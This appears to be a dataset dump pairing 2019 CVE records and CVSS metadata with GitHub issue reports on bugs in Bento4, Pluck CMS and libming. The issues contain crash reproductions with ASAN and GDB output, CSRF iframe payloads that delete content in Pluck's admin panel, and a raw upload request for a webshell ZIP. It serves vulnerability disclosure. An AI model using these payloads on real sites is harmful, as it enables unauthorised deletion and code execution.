An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in the function AP4_List:Find located in Core/Ap4List.h when called from Core/Ap4Movie.cpp. It can be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/364" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/null-pointer-dereference-vulnerability-in-function-ap4_listfind-bento4-1-5-1-628/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/364
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**Description** - we observed a NULL pointer dereference occured in function AP4_List<AP4_Track>: Find () located in Ap4List.h.The same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4dump --track 1:E791400BC075044176E34136E3C134F35E3513BE430B907B --format text $POC` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/POC_NP?raw=true) **Degub** - **ASAN REPORT** - ``` ASAN: DEADLYSIGNAL ================================================================= ==10246==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x55d0b61aeae7 bp 0x7ffcc696e490 sp 0x7ffcc696e460 T0) ==10246==The signal is caused by a READ memory access. ==10246==Hint: address points to the zero page. #0 0x55d0b61aeae6 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 #1 0x55d0b61adb79 in AP4_Movie::GetTrack(unsigned int) /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4Movie.cpp:148 #2 0x55d0b6161f2f in DumpTrackData(char const*, AP4_File&, AP4_Array<unsigned int> const&, AP4_ProtectionKeyMap const&) /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:183 #3 0x55d0b616304f in main /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:367 #4 0x7faa6d1a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55d0b61612f9 in _start (/home/aceteam/Desktop/packages/Bento4/builds/mp4dump+0x3082f9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const ==10246==ABORTING ``` **GDB** - ``` Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x20 $rbx : 0x7fffffffd7e0 β†’ 0x0000555555da9370 β†’ 0x0000555555869846 β†’ <AP4_AtomFactory::~AP4_AtomFactory()+0> push rbp $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd6f0 β†’ 0x00007fffffffd730 β†’ 0x00000001ffffd750 β†’ 0x0000000000000000 $rbp : 0x7fffffffd720 β†’ 0x00007fffffffd810 β†’ 0x00007fffffffd880 β†’ 0x00007fffffffdc70 β†’ 0x0000555555985150 β†’ <__libc_csu_init+0> push r15 $rsi : 0x7fffffffd7a0 β†’ 0x0000555555da98f0 β†’ 0x00005555558aa0fe β†’ <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp $rdi : 0x20 $rip : 0x5555558a9ae7 β†’ <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] $r8 : 0x6 $r9 : 0x1e $r10 : 0x7ffff7fbd000 β†’ 0x00007ffff7fee000 β†’ 0x00007ffff716a698 β†’ 0x00007ffff6f09090 β†’ repz ret $r11 : 0x7ffff64a9b97 β†’ <__libc_start_main+231> mov edi, eax $r12 : 0x7fffffffd740 β†’ 0x0000000041b58ab3 $r13 : 0xffffffffae8 β†’ 0x0000000000000000 $r14 : 0x20 $r15 : 0x7fffffffd740 β†’ 0x0000000041b58ab3 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $ss: 0x002b $cs: 0x0033 $gs: 0x0000 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd6f0β”‚+0x00: 0x00007fffffffd730 β†’ 0x00000001ffffd750 β†’ 0x0000000000000000 ← $rsp 0x00007fffffffd6f8β”‚+0x08: 0x00007fffffffd760 β†’ 0x0000000000000000 0x00007fffffffd700β”‚+0x10: 0x00007fffffffd7a0 β†’ 0x0000555555da98f0 β†’ 0x00005555558aa0fe β†’ <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd708β”‚+0x18: 0x0000000000000020 0x00007fffffffd710β”‚+0x20: 0x00000001fffffaf8 β†’ 0x0000000000000000 0x00007fffffffd718β”‚+0x28: 0x00007fffffffd7a0 β†’ 0x0000555555da98f0 β†’ 0x00005555558aa0fe β†’ <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd720β”‚+0x30: 0x00007fffffffd810 β†’ 0x00007fffffffd880 β†’ 0x00007fffffffdc70 β†’ 0x0000555555985150 β†’ <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffd728β”‚+0x38: 0x00005555558a8b7a β†’ <AP4_Movie::GetTrack(unsigned+0> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x5555558a9adb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdi, rax 0x5555558a9ade <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> call 0x55555585c180 <__asan_report_load8@plt> 0x5555558a9ae3 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x18] β†’ 0x5555558a9ae7 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] 0x5555558a9aeb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov QWORD PTR [rbp-0x8], rax 0x5555558a9aef <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> cmp QWORD PTR [rbp-0x8], 0x0 0x5555558a9af4 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> je 0x5555558a9c13 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const+361> 0x5555558a9afa <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x20] 0x5555558a9afe <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdx, rax ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/aceteam//Bento4/Source/C++/Core/Ap4List.h+428 ]──── 423 template <typename T> 424 inline 425 AP4_Result 426 AP4_List<T>::Find(const typename Item::Finder& finder, T*& data) const 427 { // item=0x00007fffffffd718 β†’ [...] β†’ <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp β†’ 428 Item* item = m_Head; 429 430 while (item) { 431 if (finder.Test(item->m_Data) == AP4_SUCCESS) { 432 data = item->m_Data; 433 return AP4_SUCCESS; ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4dump", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x5555558a9ae7 β†’ Name: AP4_List<AP4_Track>::Find(this=0x20, finder=@0x7fffffffd7a0, data=@0x7fffffffd760) [#1] 0x5555558a8b7a β†’ Name: AP4_Movie::GetTrack(this=0x0, track_id=0x1) [#2] 0x55555585cf30 β†’ Name: DumpTrackData(mp4_filename=0x7fffffffe17b "$POC", mp4_file=@0x7fffffffdb80, tracks_to_dump=@0x7fffffffda80, key_map=@0x7fffffffdac0) [#3] 0x55555585e050 β†’ Name: main(argc=0x6, argv=0x7fffffffdd90) ───────────────────────────────────────────────────────────────────────────────────────────────── ```
NULL POINTER DEREFERENCE in AP4_List<AP4_Track>: Find ()
https://api.github.com/repos/axiomatic-systems/Bento4/issues/364/comments
0
2019-02-01T10:30:07Z
2019-02-01T10:30:07Z
https://github.com/axiomatic-systems/Bento4/issues/364
405,641,344
364
CVE-2019-9048
2019-02-23T19:29:00.247
An issue was discovered in Pluck 4.7.9-dev1. There is a CSRF vulnerability that can delete a theme (aka topic) via a /admin.php?action=theme_delete&var1= URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/69" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.9:dev1:*:*:*:*:*:*", "matchCriteriaId": "C9CA99FC-9182-430A-B005-00A057057AB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pluck-cms/pluck/issues/69
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
One: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified image. Vulnerability url: http://127.0.0.1/pluck/admin.php?action=images Vulnerability POC: <iframe src="http://127.0.0.1/pluck/admin.php?action=deleteimage&var1=test.jpg" > Two: use the CSRF vulnerability to delete the topic Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified topic. Vulnerability url: http://127.0.0.1/pluck/admin.php?action=theme Vulnerability POC: <iframe src="http://127.0.0.1/pluck/admin.php?action=theme_delete&var1=oldstyl"> Three: use CSRF vulnerability to remove the module Vulnerability details: When the administrator logs in, open the webpage and the specified module will be deleted automatically. Vulnerability url: http://127.0.0.1/pluck/admin.php?action=modules Vulnerability POC: <iframe src="http://127.0.0.1/pluck/admin.php?action=module_delete&var1=albums " > Four: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified article. Vulnerability url: http://127.0.0.1/pluck/admin.php?action=page Vulnerability POC: <iframe src="http://127.0.0.1/pluck/admin.php?action=deletepage&var1=aaaa"> Vulnerability suggestions: One: Detect user submissions by referer, token, or verification code. Second: It is best to use the post operation for users to modify and delete.
Four CSRF vulnerabilities in pluck cms 4.7.9
https://api.github.com/repos/pluck-cms/pluck/issues/69/comments
12
2019-02-18T07:08:41Z
2019-05-15T16:25:24Z
https://github.com/pluck-cms/pluck/issues/69
411,330,487
69
CVE-2019-9050
2019-02-23T19:29:00.343
An issue was discovered in Pluck 4.7.9-dev1. It allows administrators to execute arbitrary code by using action=installmodule to upload a ZIP archive, which is then extracted and executed.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/70" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.9:dev1:*:*:*:*:*:*", "matchCriteriaId": "C9CA99FC-9182-430A-B005-00A057057AB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pluck-cms/pluck/issues/70
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Vulnerability details: In the management module page, the installation module uploads a compressed webshell, which can be directly uploaded and decompressed, causing the entire website to crash. Vulnerability url: http://127.0.0.1/pluck/admin.php?action=installmodule Vulnerability POC: POST /pluck/admin.php?action=installmodule HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/pluck/admin.php?action=installmodule Content-Type: multipart/form-data; boundary=---------------------------26299170359894 Content-Length: 56087 Connection: close Cookie: envlpass=21232f297a57a5a743894a0e4a801fc3; _ga=GA1.1.1523573753.1550292454; PHPSESSID=vr8t3uqdsh6gu011nijv1jjjco Upgrade-Insecure-Requests: 1 -----------------------------26299170359894 Content-Disposition: form-data; name="sendfile"; filename="webshell.zip" Content-Type: application/x-zip-compressed
A file upload vulnerability
https://api.github.com/repos/pluck-cms/pluck/issues/70/comments
4
2019-02-18T07:28:57Z
2019-05-15T14:01:12Z
https://github.com/pluck-cms/pluck/issues/70
411,336,254
70
CVE-2019-9113
2019-02-25T04:29:00.463
Ming (aka libming) 0.4.8 has a NULL pointer dereference in the function getString() in the decompile.c file in libutil.a.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/171
[ "Issue Tracking", "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
A null pointer dereference was found in function getString() (decompile.c line 381) Details is as below: ``` ASAN:SIGSEGV ================================================================= ==30834==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000411266 bp 0x7ffd28773620 sp 0x7ffd28773580 T0) #0 0x411265 in getString /src/libming-afl/util/decompile.c:381 #1 0x412f8c in newVar_N /src/libming-afl/util/decompile.c:725 #2 0x41685e in decompileNEWOBJECT /src/libming-afl/util/decompile.c:1677 #3 0x41ed5a in decompileAction /src/libming-afl/util/decompile.c:3283 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f83c852182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x401998 in _start (/src/fuzz/swftocxx+0x401998) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/libming-afl/util/decompile.c:381 getString ==30834==ABORTING ``` poc file : https://github.com/JsHuang/libming-poc/blob/master/swftocxx/SIGSEGV_decompile_381 Reproduce it using: `./swftocxx SIGSEGV_decompile_381 ` credit: ADLab of Venustech
Null pointer dereference in getString (decompile.c 381)
https://api.github.com/repos/libming/libming/issues/171/comments
1
2019-01-02T06:33:17Z
2019-03-01T14:19:12Z
https://github.com/libming/libming/issues/171
395,159,602
171
CVE-2019-9114
2019-02-25T04:29:00.497
Ming (aka libming) 0.4.8 has an out of bounds write vulnerability in the function strcpyext() in the decompile.c file in libutil.a.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/170
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
An Out Of Bound Write bug was found in function strcpyext() in decompile.c . Details with asan output is as below: ``` ==30836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x000000410767 bp 0x7fff7361f360 sp 0x7fff7361f350 WRITE of size 1 at 0x60300000ee18 thread T0 #0 0x410766 in strcpyext /src/libming-afl/util/decompile.c:259 #1 0x41164a in getName /src/libming-afl/util/decompile.c:418 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x401998 in _start (/src/fuzz/swftocxx+0x401998) 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) allocated by thread T0 here: #0 0x7f0d41dfd602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x41162f in getName /src/libming-afl/util/decompile.c:417 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/libming-afl/util/decompile.c:259 strcpyext Shadow bytes around the buggy address: 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9dc0: 00 00 00[fa]fa fa fd fd fd fd fa fa fd fd fd fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff9de0: fd fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff9df0: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==30836==ABORTING ``` poc file https://github.com/JsHuang/libming-poc/blob/master/swftocxx/oob_write_decompile_259 to reproduce it ,run swftocxx with oob_write_decompile_259 `./swftocxx oob_write_decompile_259 ` credit: ADLab of Venustech
Out Of Bound Write in function strcpyext()
https://api.github.com/repos/libming/libming/issues/170/comments
1
2019-01-02T06:25:41Z
2019-03-01T14:19:41Z
https://github.com/libming/libming/issues/170
395,158,669
170
README.md exists but content is empty. Use the Edit dataset card button to edit it.
Downloads last month
38
Edit dataset card